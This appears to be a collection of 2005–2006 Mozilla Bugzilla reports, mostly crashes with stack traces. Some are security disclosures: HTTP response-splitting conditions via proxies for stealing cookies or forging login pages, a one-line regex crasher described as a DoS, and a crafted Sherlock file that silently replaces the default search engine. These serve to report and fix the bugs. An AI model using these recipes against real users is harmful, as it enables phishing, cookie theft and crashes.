The malicious Web site admins can target Firefox (and IE) users who use HTTP proxy (that keep-alive anabled) to steal cookies or build web pages including fake login form for arbitrary domains.
For Firefox (and IE) users who don't use HTTP proxy, the attackers can also exploit same problem for web site with another domain name on the same IP address.
Workaround for site admins: disable keep-alive
More info coming.
|
|
332,173 | 2,814,674 |
The way the character '~' is parsed (by iterating from the end of the pattern to the front to find it) is incorrect, because it assumes that '~' always signifies a negation pattern (pat~pat2) if it's not escaped. However, characters other than ']' in character classes (e.g., '[abc]') are *not* escaped. Further problems also appear in invalid patterns which combine '(pat|pat2)' and 'pat~pat2' syntaxes, and in some cases it is possible to produce a crash.
To demonstrate these bugs, here's a table of results of testing various patterns against various strings. These patterns and strings should be considered as "raw" strings, so if they were actually being used in code '\' would need to be escaped.
Pattern String Match? Is Behavior Correct?
-------------------------------------------------------
a[a\~b] aa yes yes
a[a\~b] a\ yes yes
a[a\~b] a~ yes yes
a[a~b] a~ NO NO
a[a~b]b a~b NO NO
(a|b)(a|~)b a~b CRASH "NO"
Note that the last behavior isn't strictly incorrect because there's no specified behavior, but ideally it should be impossible for any pattern/string combination to cause a crash regardless of pattern validity.
|
|
333,497 | 2,824,566 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060410 SeaMonkey/1.5a
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060410 SeaMonkey/1.5a
If you visit http://tekade.de , SM-Trunk crashes, if JavaScript is turned off.
The site checks, if JavaScript is anabled and sends a warningpage if its not anabled. At this moment SM crashes.
Reproducible: Always
Steps to Reproduce:
1.turn JS off
2.visit http://tekade.de
3.crash
Actual Results:
SM crashes
Expected Results:
SM should show the warningpage
Talkback-ID is: TB17412065Z (thanks to toscha)
Searching for the last good build was tricky.
2005090804 was the last build that show the warningpage on my system.
2005090904 show an empty page but do not crash.
2005102104 always do so.
2005102112 crashes.
This is a very small window and gives a good chance to find the responsible check in!
|
|
340,796 | 2,876,755 |
Steps to reproduce, at least on my machine:
1. Launch 2006-06-07 nightly.
2. Close it.
3. Launch trunk build from the command line.
Result: Crash [@ nsXULDocument::ResumeWalk] after "WARNING: nsExceptionService ignoring thread destruction after shutdown: file /Users/admin/trunk/mozilla/xpcom/base/nsExceptionService.cpp, line 191".
|
|
329,746 | 2,796,697 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: N/A
Note: This bug was originally reported to IPA (Information-technology Promotion Agency, Japan) and forwarded to us at Mozilla Japan. I'm NOT original reporter. Don't mention my name in the security advisory. For more information about IPA, visit http://www.ipa.go.jp/about/english/
IPA#62734622
Attackers can forge a Web page on another domain by sending the HTTP response including Transfer-Encoding header with a space between header name and colon (:). This could be used for the real phishing to steal sensitive data, such as user password or cookies.
Windows XP Professional SP2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060129 Firefox/1.6a1
Reproducible: Sometimes
Steps to Reproduce:
1. Set up Firefox to use Microsoft Internet Security & Acceleration Server 2004 (ISA Server) for HTTP proxy
2. Provide the proxy with HTTP response with the following conditions:
A. "Content-Length" header is included
B. "Transfer-Encoding : chunked" is included (note a space between "Encoding" and ":")
C. response length with chunk size data of B is shorter than the value of A
Actual Results:
"Transfer-Encoding SP" header (Transfer-Encoding header with a space) is not defined by HTTP/1.1. Therefore, ISA Server will send data of the number of bytes specified by Content-Length header to the browser. Transfer-Encoding header with a space will be transferred as is. This is appropriate behavior compliant with HTTP/1.1.
Received the response via proxy, Firefox recognizes "Transfer-Encoding SP" header as "Transfer-Encoding" header and understands that the response body is chunked encoded.
The rest of response determined by the condition C is incorrectly recognized as the response of following HTTP request.
Expected Results:
The rest of response should not be recognized as the response of following HTTP request.
The malicious Web site admins can target Firefox users who use HTT/1.1 proxy to steal cookies or build web pages including fake login form for arbitrary domains.
Workaround: Don't use ISA Server
More info coming.
|
|
330,214 | 2,799,958 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: N/A
Note: This bug was originally reported to IPA (Information-technology Promotion Agency, Japan) and forwarded to us at Mozilla Japan. I'm NOT original reporter. Don't mention my name in the security advisory. For more information about IPA, visit http://www.ipa.go.jp/about/english/
JVN28513736
Attackers can forge a Web page on another domain by sending the HTTP response including "Content-Length" header and "Transfer-Encoding: chunked" header. This could be used for the real phishing to steal sensitive data, such as user password or cookies.
Windows XP Professional SP2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060129 Firefox/1.6a1
Reproducible: Sometimes
Steps to Reproduce:
1. Set up Firefox to use Squid/2.5.STABLE12 for HTTP proxy
2. Configure Squid. Set the value of "persistent_request_timeout" to "1 minute".
2. Provide the proxy with HTTP response with the following conditions:
A. "Content-Length" header is included
B. "Transfer-Encoding: chunked" is included
C. response length with chunk size data of B is shorter than the value of A
Actual Results:
Squid conforms to HTTP/1.0, not to HTTP/1.1. Therefore, It will send data of the number of bytes specified by Content-Length header to the browser. Transfer-Encoding header with a space will be transferred as is. This is appropriate behavior compliant with HTTP/1.0.
Firefox will receive the response via proxy and handle the response body based on Transfer-Encoding header. Firefox determines the termination of message body based on the last chunk of chunked encoding, not Content-Length.
The rest of response determined by the condition C is incorrectly recognized as the response of following HTTP request.
Expected Results:
The rest of response should not be recognized as the response of following HTTP request.
Additional Information:
The malicious Web site admins can target Firefox users who use HTTP proxy (that keep-alive anabled) to steal cookies or build web pages including fake login form for arbitrary domains.
Original reporter says that Firefox doesn't ignore the header that isn't part of HTTP/1.0 (but is defined by HTTP/1.1) when it interprets HTTP/1.0 response. Although this report makes an issue of Transfer-Encoding header, but other headers might be a problem.
Reporter also says Firefox should be implemented not to reuse stream that is connected to the HTTP proxy when it starts connection to another web server.
Workaround for Squid admins: disable keep-alive
|
|
330,220 | 2,800,009 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060311 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060311 Firefox/1.6a1
freeze or clash, when click a link in history of Places
Reproducible: Sometimes
Steps to Reproduce:
1. open Places window, and History window.
2. click a link in history.
3. displaied "Waiting for (hostname)..." in status bar
"Loading..." in tab
Actual Results:
4. cannot open a link
Expected Results:
4. open a link
close Places window / Firefox's window,
and restart Firefox.
cannot start Firefox
open task manager, click process tab.
Firefox is found in process.
it is zombie.
It crashed once.
TB16252592X
|
|
330,352 | 2,800,842 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060313 Firefox/1.6a1
Note: This bug was originally reported to IPA (Information-technology Promotion Agency, Japan) and forwarded to us at Mozilla Japan. I'm NOT original reporter. Don't ask me about details. For more information about IPA, visit http://www.ipa.go.jp/about/english/
IPA#36438227
Reproducible: Always
Steps to Reproduce:
Loading the following script causes Firefox to crash:
javascript:if("AB".match(/(.*?)*?B/)){alert(RegExp.lastMatch);}
No problem with:
javascript:if("AB".match(/(.*)*?B/)){alert(RegExp.lastMatch);}
or
javascript:if("AB".match(/(.*?)*B/)){alert(RegExp.lastMatch);}
Actual Results:
Firefox consumes large amounts of memory and CPU time of machine, causes application error, and crashes.
Expected Results:
Don't crash
Comment from IPA:
This bug allows websites to crash user machines or perform a DoS attack. We [IPA] have examined the problem and found that application error occurred at jsregexp.c. Attackers might run arbitrary code, but we have not found real way of code injection.
IPA asked us to treat this bug confidential, but if there are no risks, uncheck the security mark.
|
|
342,219 | 2,888,699 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060620 SeaMonkey/1.5a
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060620 SeaMonkey/1.5a
In the current nightly build selecting Tools > Download Manager causes a crash in Seamonkey
The Seamon~1.EXE Application Error reads:
The instruction at "0x603fc2e2" referenced memory at "0x00000000". The memory could not be "read".
Click on OK to terminate the program
Click on CANCEL to debug the program
The Netscape Quality Feedback Agent - Mozella Trunk is then run and it sends back a report if I tell it to, which I always do.
Reproducible: Always
Steps to Reproduce:
1. Select Tool Menu
2. Select Download Manager
3. Brings up Seamon~1.EXE Application Error
Actual Results:
The Seamon~1.EXE Application Error reads:
The instruction at "0x603fc2e2" referenced memory at "0x00000000". The memory could not be "read".
Click on OK to terminate the program
Click on CANCEL to debug the program
The Netscape Quality Feedback Agent - Mozella Trunk is then run
Expected Results:
Download Manager should run as expected. It runs when a download is selected from a web page.
|
|
342,448 | 2,890,925 |
STEPS TO REPRODUCE: Click URL in this bug, or just mistakenly flip the two args to any setTimeout call.
ACTUAL RESULTS: crash
EXPECTED RESULTS: exception
MORE INFORMATION:
###!!! ASSERTION: No expression, so no handler text!: 'mExpr', file ../../../../mozilla/dom/src/base/nsJSTimeoutHandler.cpp, line 316
I bet the issue is that nsJSScriptTimeoutHandler::Init returns NS_OK even though it's throwing an exception, so we end up still setting up the timeout or something silly like that.
|
|
291,516 | 2,483,814 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b2) Gecko/20050421 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b2) Gecko/20050421 Firefox/1.0+
The fix to bug 254225 hastily eliminated the Command-LeftArrow and
Command-RightArrow keyboard shortcuts from Mac builds. This was seemingly done
without any discussion.
These keyboard shortcuts have been in every Mac browser since the beginning of
time. It's one thing if Firefox does not wish to use these keystrokes as its
primary shortcuts or expose them in the Go menu, but it's another thing entirely
to remove them altogether.
All other Mac browsers, including Safari, Camino, and Seamonkey, support the
Command-Arrow shortcuts IN ADDITION to Command-[ and Command-]. In each case,
the [ and ] shortcuts are the ones visible in the menus, but the arrows still
work. When bug 117186 was fixed (the Seamonkey companion to bug 254225), the
Command-Arrow shortcuts were allowed to remain.
The Command-Arrow shortcuts are what many users expect, and they should not be
removed.
Reproducible: Always
Steps to Reproduce:
|
|
292,257 | 2,489,090 |
To reproduce:
1. Go to URL
2. See crash
This is a rather recent regression, so not the same as the other two crashers
with nsHTMLReflowState::ComputePadding in frame 0 of the stacktrace.
This regressed between 2005-02-18-06 and 2005-02-19-06.
Bonsai link:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&module=SeaMonkeyAll&branch=HEAD&branchtype=match&filetype=match&whotype=match&sortby=Date&hours=2&date=explicit&mindate=2005-02-18+05%3A00%3A00&maxdate=2005-02-19+07%3A00%3A00&cvsroot=%2Fcvsroot
Stacktrace:
nsHTMLReflowState::ComputePadding(nsHTMLReflowState * const 0x02d28ea0, int
0x00000a8c, const nsHTMLReflowState * 0x0012e3ac) line 2435 + 2 bytes
nsHTMLReflowState::InitConstraints(nsHTMLReflowState * const 0x02d28ea0,
nsPresContext * 0x02c71d40, int 0x00000a8c, int 0x00000267, nsMargin *
0x00000000, nsMargin * 0x00000000) line 1718
nsHTMLReflowState::Init(nsHTMLReflowState * const 0x02d28ea0, nsPresContext *
0x02c71d40, int 0xffffffff, int 0xffffffff, nsMargin * 0x00000000, nsMargin *
0x00000000) line 337 + 22 bytes
nsHTMLReflowState::nsHTMLReflowState(nsHTMLReflowState * const 0x02d28ea0,
nsPresContext * 0x02c71d40, const nsHTMLReflowState & {...}, nsIFrame *
0x02d28ea0, const nsSize & {...}) line 261
nsObjectFrame::HandleChild(nsObjectFrame * const 0x02d28ea0, nsPresContext *
0x02c71d40, nsHTMLReflowMetrics & {...}, const nsHTMLReflowState & {...},
unsigned int & 0x00000000, nsIFrame * 0x02d28ea0) line 1446
nsObjectFrame::Reflow(nsObjectFrame * const 0x000000b4, nsPresContext *
0x02c71d40, nsHTMLReflowMetrics & {...}, const nsHTMLReflowState & {...},
unsigned int & 0x00000000) line 1041 + 20 bytes
nsLineLayout::ReflowFrame(nsLineLayout * const 0x02d28ea0, nsIFrame *
0x02ca819c, unsigned int & 0x00000000, nsHTMLReflowMetrics * 0x00000000, int &
0x00000000) line 999
nsInlineFrame::ReflowInlineFrame(nsInlineFrame * const 0x02d28ea0, nsPresContext
* 0x02c71d40, const nsHTMLReflowState & {...}, nsInlineFrame::InlineReflowState
& {...}, nsIFrame * 0x02ca819c, unsigned int & 0x00000000) line 712
nsInlineFrame::ReflowFrames(nsInlineFrame * const 0x02d28ea0, nsPresContext *
0x02c71d40, const nsHTMLReflowState & {...}, nsInlineFrame::InlineReflowState &
{...}, nsHTMLReflowMetrics & {...}, unsigned int & 0x00000000) line 530
nsInlineFrame::Reflow(nsInlineFrame * const 0x02ca80a4, nsPresContext *
0x02c71d40, nsHTMLReflowMetrics & {...}, const nsHTMLReflowState & {...},
unsigned int & 0x00000000) line 444
nsLineLayout::ReflowFrame(nsLineLayout * const 0x02d28ea0, nsIFrame *
0x02ca80a4, unsigned int & 0x00000000, nsHTMLReflowMetrics * 0x00000000, int &
0x00000000) line 999
nsBlockFrame::ReflowInlineFrame(nsBlockFrame * const 0x02d28ea0,
nsBlockReflowState & {...}, nsLineLayout & {...}, nsLineList_iterator {...},
nsIFrame * 0x00000000, unsigned char * 0x0012e763) line 4187 + 29 bytes
nsBlockFrame::DoReflowInlineFrames(nsBlockFrame * const 0x02d28ea0,
nsBlockReflowState & {...}, nsLineLayout & {...}, nsLineList_iterator {...}, int
* 0x0012e95c, unsigned char * 0x0012e82b, int 0x00000000, int 0x00000001) line 3840
|
|
289,292 | 2,467,412 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050406 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050406 Firefox/1.0+
Firefox frequently crash or freeze while loading
http://www.phoenixjp.net/news/fr/. This bug has been present for approximately 2
months (maybe more, I don't remember) in the trunk builds. It should load the
page whithout crashing or freezing.
Sometimes the page load well, sometimes I have to retry 5 or more times to
succesfully load it.
When it freezes, I have to kill Firefox's process in the task manager.
Reproducible: Sometimes
Steps to Reproduce:
1. Navigate to http://www.phoenixjp.net/news/fr
Actual Results:
Firefox crash or freeze while opening the page
Expected Results:
Open the page without crashing or hanging
Error when it crashes :
FIREFOX.EXE - Application Error
The instruction at "0x..." referenced memory at "0x...". The memory could not be
"read".
Click on OK to terminate the program
Click on CANCEL to debug the program
|
|
289,765 | 2,471,117 |
Build IDs:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050409
Firefox/1.0+
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050409
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2 StumbleUpon/1.9993
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041217
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
As I said in my comments on Bug 63817, I am going to file a new one on the crash
when going to the URL http://spam.hixie.ch. I am not sure what causes the
crash. During our long discussion about this issue in #bs, we came up with
several ideas, which were relayed in comments on Bug 63817. One of the
possibilities seems to be that there is a 404 for something on the page and the
404 is requesting a 301 causing the crash. Nobody really has any idea. At any
rate, I have successfully crashed this once on Trunk, where it previously didn't
crash, although I am not sure if the crash is going to be consistent on Trunk,
since now it seems to want to simply hang. Previously, I was able to actually
see the page on Trunk as it was supposed to be, without issue. On 1.7.5 and
1.7.6 Seamonkey, this crashes everytime. Same deal on 1.0.2 Milestone and
1.0.3/Aviary Nightly. In channel Aebrahim, Tom, and Chewie (Alexander) all
reproduced this, so I am going to go ahead and mark it as NEW from the get-go.
Chewie proposed there may be something in the server configuration that is
causing the crash. At any rate, I would love for Hixie to give this some attention.
Steps to Reproduce:
1. Make sure you don't have anything open you can't get back to.
2. Goto http://spam.hixie.ch
3. Crash and burn, baby
Actual Results:
Firefox/Seamonkey both crash.
Expected Results:
Render the page appropriately.
Note:
I wasn't sure where to file this, but put it where told:
<jesus_X> umm, try http
<jesus_X> it seems to be a header issue I think
<Tristor> hmmz, okay
<jesus_X> it core networking
I am attaching the stacktraces and other information from the Talkback IDs I got
from crashing it, which are:
TB4973854Q (Trunk), TB4973989Z (Aviary), TB4974002E (Aviary), TB4974032X
(Aviary), TB4975251H (Milestone), TB4975132M (1.7.6 Seamonkey)
Any more information I can offer, I will be more than willing to share, but I
can't think of much of anything else to add.
Adding the crash, hang, and clean-report keywords, and helpwanted and qawanted
for help testcasing/implementing this
|
|
290,038 | 2,473,159 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
By creating a special sherlock file it is possible to overwrite an existing
search engine without a chance for the user to see what is going on. The
displayed name in the confirmation dialog is given as the third parameter of
sidebar.addSearchEngine(), but the displayed name in the search dropdown is
taken from the sherlock file. This way it is possible to overwrite the default
Google search with a modified version that monitors the data and/or waits for a
chance to run code (see Firesearching 1 on demo page). The string "google.src"
in the source URL got also be moved out of the dialog by supplying a really long
URL to the sherlock file (the dialog just cuts the source URL when it's getting
too long).
Reproducible: Always
Steps to Reproduce:
1. Open http://bugzilla:[email protected]/firesearching/
2. Follow instructions
The user will probably think the search engine installation just failed, because
after confirming the installation dialog Firefox never displays an error
messages if the installation failed because e.g. the sherlock file is broken or
not found. Since there is no UI to see details about the installed searches a
common user will probably never find out that the default Google search got
modified. Using the built in sherlock update feature an attacker also gets a
decent update mechanism to modifiy the scripts beyond the initial infection.
|
|
287,197 | 2,451,274 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8b2) Gecko/20050308
Build Identifier: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8b2) Gecko/20050308
comments in os_Linux_ia64.s were changed a few weeks ago. The change breaks
builds on gcc 3.3.x. Is the change needed for gcc 4?
Reproducible: Always
Steps to Reproduce:
.
Actual Results:
os_Linux_ia64.s:41: Error: junk at end of line, first unrecognized character is `/'
|
|
287,308 | 2,452,195 |
The following XUL code crashes Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8b2) Gecko/20050319 Firefox/1.0+ but not Firefox 1.0.x. It also crashes
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050305
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
<window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<menubar>
<menu>
<menupopup id="mypopup">
<menuitem label="Test"/>
</menupopup>
</menu>
</menubar>
<label value="Right-click me!" context="mypopup"/>
</window>
To reproduce, load this in the browser and right-click the label. Even if the
popup had children, it wouldn't show (not sure that is correct) and when closing
the window, browser crashes.
The key here is
1) to put <menupopup/> in a place where it wouldn't be "found" by context
property. Note that if you remove it altogether, the crash doesn't occur.
2) to use context, not menucontext on <label/>. From my limited testing,
menucontext works relatively fine with this (that is not crashes, while still
not showing the popup).
I'm not able to track down the regression, the only thing I can say it happens
with 20050128 build, the earliest Firefox trunk build I installed on my system.
Talkback has never worked for me, so someone else will have to submit the report
if it is needed. The bug is reproducible for me on a clean profile for me, so it
shouldn't be much of a trouble.
Not sure if it should go here, in Menus or in a completely separate place.
|
|
287,763 | 2,455,840 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Received the following error after upgrading from tip:
Software error:
Insecure dependency in require while running with -T switch at
/usr/lib/perl5/5.8.3/i586-linux-thread-multi/IO/Socket.pm line 22.
Compilation failed in require at /usr/lib/perl5/vendor_perl/5.8.3/Net/LDAP.pm
line 8.
BEGIN failed--compilation aborted at
/usr/lib/perl5/vendor_perl/5.8.3/Net/LDAP.pm line 8.
Compilation failed in require at Bugzilla/Auth/Verify/LDAP.pm line 38.
BEGIN failed--compilation aborted at Bugzilla/Auth/Verify/LDAP.pm line 38.
Compilation failed in require at Bugzilla/Auth.pm line 43.
BEGIN failed--compilation aborted at Bugzilla/Auth.pm line 45.
Compilation failed in require at Bugzilla.pm line 28.
BEGIN failed--compilation aborted at Bugzilla.pm line 28.
Compilation failed in require at Bugzilla/Bug.pm line 38.
BEGIN failed--compilation aborted at Bugzilla/Bug.pm line 38.
Compilation failed in require at CGI.pl line 48.
BEGIN failed--compilation aborted at CGI.pl line 48.
Software error:
[Fri Mar 25 19:42:52 2005] index.cgi: Insecure dependency in require while
running with -T switch at
/usr/lib/perl5/5.8.3/i586-linux-thread-multi/IO/Socket.pm line 22.
[Fri Mar 25 19:42:52 2005] index.cgi: Compilation failed in require at
/usr/lib/perl5/vendor_perl/5.8.3/Net/LDAP.pm line 8.
[Fri Mar 25 19:42:52 2005] index.cgi: BEGIN failed--compilation aborted at
/usr/lib/perl5/vendor_perl/5.8.3/Net/LDAP.pm line 8.
[Fri Mar 25 19:42:52 2005] index.cgi: Compilation failed in require at
Bugzilla/Auth/Verify/LDAP.pm line 38.
[Fri Mar 25 19:42:52 2005] index.cgi: BEGIN failed--compilation aborted at
Bugzilla/Auth/Verify/LDAP.pm line 38.
[Fri Mar 25 19:42:52 2005] index.cgi: Compilation failed in require at
Bugzilla/Auth.pm line 43.
[Fri Mar 25 19:42:52 2005] index.cgi: BEGIN failed--compilation aborted at
Bugzilla/Auth.pm line 45.
[Fri Mar 25 19:42:52 2005] index.cgi: Compilation failed in require at
Bugzilla.pm line 28.
[Fri Mar 25 19:42:52 2005] index.cgi: BEGIN failed--compilation aborted at
Bugzilla.pm line 28.
[Fri Mar 25 19:42:52 2005] index.cgi: Compilation failed in require at
Bugzilla/Bug.pm line 38.
[Fri Mar 25 19:42:52 2005] index.cgi: BEGIN failed--compilation aborted at
Bugzilla/Bug.pm line 38.
[Fri Mar 25 19:42:52 2005] index.cgi: Compilation failed in require at CGI.pl
line 48.
[Fri Mar 25 19:42:52 2005] index.cgi: BEGIN failed--compilation aborted at
CGI.pl line 48.
Compilation failed in require at /admin/Bugzilla/index.cgi line 33.
The system was running fine prior to the upgrade from cvs tip.
Reproducible: Always
Steps to Reproduce:
1.Upgrade test system to latest cvs tip.
2.Run Bugzilla :-)
3.Lather, rinse, repeat
|
|
287,956 | 2,457,252 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b2) Gecko/20050326
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b2) Gecko/20050326
Immediately following startup Thunderbird begins checking for new mail and
performaing virus scan. Within thirty seconds the program throws core with a
Signal 11.
Reproducible: Always
Steps to Reproduce:
Stack trace coming.
Looks like this is happening in libnecko.so.
|
|
289,156 | 2,466,263 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050403 Firefox/1.0.1
Setting up the request like this:
req = new XMLHttpRequest();
req.overrideMimeType("gzip");
...
After readystate notifies me that the document is finished loading the
reponseXML object is null but when accessing the responseText I get the
following stack trace:
> xmlextras.dll!nsXMLHttpRequest::DetectCharset(nsACString & aCharset={...})
Line 494 + 0x1f C++
xmlextras.dll!nsXMLHttpRequest::ConvertBodyToText(nsAString &
aOutBuffer={...}) Line 523 + 0xf C++
xmlextras.dll!nsXMLHttpRequest::GetResponseText(nsAString &
aResponseText={...}) Line 605 + 0xc C++
xpcom.dll!XPTC_InvokeByIndex(nsISupports * that=0x065ffac0, unsigned int
methodIndex=5, unsigned int paramCount=1, nsXPTCVariant * params=0x0012ad70)
Line 102 C++
xpc3250.dll!XPCWrappedNative::CallMethod(XPCCallContext & ccx={...},
XPCWrappedNative::CallMode mode=CALL_GETTER) Line 2034 + 0x1e C++
xpc3250.dll!XPCWrappedNative::GetAttribute(XPCCallContext & ccx={...}) Line
1884 + 0xe C++
xpc3250.dll!XPC_WN_GetterSetter(JSContext * cx=0x065c4028, JSObject *
obj=0x065cae40, unsigned int argc=0, long * argv=0x06609080, long *
vp=0x0012b058) Line 1319 + 0xc C++
js3250.dll!js_Invoke(JSContext * cx=0x065c4028, unsigned int argc=0, unsigned
int flags=2) Line 949 + 0x20 C
js3250.dll!js_InternalInvoke(JSContext * cx=0x065c4028, JSObject *
obj=0x065cae40, long fval=106742112, unsigned int flags=0, unsigned int argc=0,
long * argv=0x00000000, long * rval=0x0012b9f0) Line 1043 + 0x14 C
js3250.dll!js_InternalGetOrSet(JSContext * cx=0x065c4028, JSObject *
obj=0x065cae40, long id=43859552, long fval=106742112, JSAccessMode
mode=JSACC_READ, unsigned int argc=0, long * argv=0x00000000, long *
rval=0x0012b9f0) Line 1086 + 0x1f C
js3250.dll!js_GetProperty(JSContext * cx=0x065c4028, JSObject *
obj=0x065cae40, long id=43859552, long * vp=0x0012b9f0) Line 2768 + 0x30 C
js3250.dll!js_Interpret(JSContext * cx=0x065c4028, long * result=0x0012bb38)
Line 2823 + 0x709 C
js3250.dll!js_Invoke(JSContext * cx=0x065c4028, unsigned int argc=1, unsigned
int flags=2) Line 966 + 0xd C
js3250.dll!js_InternalInvoke(JSContext * cx=0x065c4028, JSObject *
obj=0x0656fb10, long fval=106365544, unsigned int flags=0, unsigned int argc=1,
long * argv=0x065f8830, long * rval=0x0012bccc) Line 1043 + 0x14 C
js3250.dll!JS_CallFunctionValue(JSContext * cx=0x065c4028, JSObject *
obj=0x0656fb10, long fval=106365544, unsigned int argc=1, long *
argv=0x065f8830, long * rval=0x0012bccc) Line 3698 + 0x1f C
gklayout.dll!nsJSContext::CallEventHandler(JSObject * aTarget=0x0656fb10,
JSObject * aHandler=0x06570268, unsigned int argc=1, long * argv=0x065f8830,
long * rval=0x0012bccc) Line 1297 + 0x21 C++
gklayout.dll!GlobalWindowImpl::RunTimeout(nsTimeoutImpl * aTimeout=0x06608cd8)
Line 5390 C++
gklayout.dll!GlobalWindowImpl::TimerCallback(nsITimer * aTimer=0x06608da8,
void * aClosure=0x06608cd8) Line 5752 C++
xpcom.dll!nsTimerImpl::Fire() Line 382 + 0x11 C++
xpcom.dll!nsTimerManager::FireNextIdleTimer() Line 616 C++
gkwidget.dll!nsAppShell::GetNativeEvent(int & aRealEvent=1, void * &
aEvent=0x01113950) Line 197 C++
appshell.dll!nsXULWindow::ShowModal() Line 362 + 0x1f C++
appshell.dll!nsWebShellWindow::ShowModal() Line 1104 C++
appshell.dll!nsContentTreeOwner::ShowAsModal() Line 468 C++
embedcomponents.dll!nsWindowWatcher::OpenWindowJS(nsIDOMWindow *
aParent=0x0297854c, const char * aUrl=0x0658ad08, const char * aName=0x0012c498,
const char * aFeatures=0x0012c4f0, int aDialog=1, unsigned int argc=2, long *
argv=0x06070fac, nsIDOMWindow * * _retval=0x0012c624) Line 786 C++
gklayout.dll!GlobalWindowImpl::OpenInternal(const nsAString & aUrl={...},
const nsAString & aName={...}, const nsAString & aOptions={...}, int aDialog=1,
long * argv=0x06070fa0, unsigned int argc=5, nsISupports *
aExtraArgument=0x00000000, nsIDOMWindow * * aReturn=0x0012c9a4) Line 4983 +
0x8f C++
gklayout.dll!GlobalWindowImpl::OpenDialog(nsIDOMWindow * * _retval=0x0012c9a4)
Line 3560 + 0x35 C++
xpcom.dll!XPTC_InvokeByIndex(nsISupports * that=0x02978550, unsigned int
methodIndex=16, unsigned int paramCount=1, nsXPTCVariant * params=0x0012c9a4)
Line 102 C++
xpc3250.dll!XPCWrappedNative::CallMethod(XPCCallContext & ccx={...},
XPCWrappedNative::CallMode mode=CALL_METHOD) Line 2034 + 0x1e C++
xpc3250.dll!XPC_WN_CallMethod(JSContext * cx=0x02977e78, JSObject *
obj=0x02a1b790, unsigned int argc=5, long * argv=0x06070fa0, long *
vp=0x0012cc78) Line 1287 + 0xe C++
js3250.dll!js_Invoke(JSContext * cx=0x02977e78, unsigned int argc=5, unsigned
int flags=0) Line 949 + 0x20 C
js3250.dll!js_Interpret(JSContext * cx=0x02977e78, long * result=0x0012d5f0)
Line 2992 + 0xf C
js3250.dll!js_Invoke(JSContext * cx=0x02977e78, unsigned int argc=0, unsigned
int flags=0) Line 966 + 0xd C
js3250.dll!js_Interpret(JSContext * cx=0x02977e78, long * result=0x0012dee4)
Line 2992 + 0xf C
js3250.dll!js_Invoke(JSContext * cx=0x02977e78, unsigned int argc=1, unsigned
int flags=2) Line 966 + 0xd C
js3250.dll!js_InternalInvoke(JSContext * cx=0x02977e78, JSObject *
obj=0x0301b238, long fval=50442832, unsigned int flags=0, unsigned int argc=1,
long * argv=0x0012e1d8, long * rval=0x0012e1e0) Line 1043 + 0x14 C
js3250.dll!JS_CallFunctionValue(JSContext * cx=0x02977e78, JSObject *
obj=0x0301b238, long fval=50442832, unsigned int argc=1, long * argv=0x0012e1d8,
long * rval=0x0012e1e0) Line 3698 + 0x1f C
